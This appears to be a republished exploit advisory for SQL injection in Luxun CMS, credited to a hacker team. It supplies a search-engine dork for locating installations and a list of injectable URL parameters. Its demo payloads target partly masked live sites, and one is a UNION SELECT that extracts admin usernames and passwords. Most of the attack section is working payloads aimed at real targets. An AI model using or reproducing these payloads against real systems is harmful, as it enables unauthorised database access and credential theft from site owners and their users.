Luxun CMS SQL Injection

2012.04.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

##### # Exploit Title: Luxun CMS SQL Injection Vulnerability # Google Dork: "powered by luxun" # Date: 7/1/2012 # Author: H4ckCity Security Team # Discovered By: farbodmahini # Home: WwW.H4ckCity.Org # Vendor Software: www.marinet.gr # Version: All Version # Category:: webapps # Security Risk:: High # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ###### # # # Exploit: # # # http://[target]/product.php?classid=[SQLi] # http://[target]/law_1.php?id=[SQLi] # http://[target]/company.php?classid=[SQLi] # http://[target]/job.php?classid=[SQLi] # http://[target]/news.php?classid=[SQLi] # http://[target]/service.php?classid=[SQLi] # http://[target]/article.php?id=[SQLi] # http://[target]/detail.php?id=[SQLi] # http://[target]/business.php?id=[SQLi] # http://[target]/search.php : Sql Injection with method post in textbox for search # # Demo: # # www.sxxinan.com/service.php?classid=26+and+1=0 # www.pexxctpotion.net.cn/article.php?id=39+and+1=0-- # www.sujxxmp.com/business.php?id=32+and+1=0 # www.suxxmp.com/detail.php?id=-86+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- # # www.zrxxxtv.com/detail.php?id=-35+union+select+1,group_concat(AdminName,0x3a,AdminPass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin-- # ############################################################################ # Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- # IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,... ############################################################################ GreetZ : All H4ckCity Member - BHG Members - 1337day.com ############################################################################

References:

http://www.marinet.gr


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top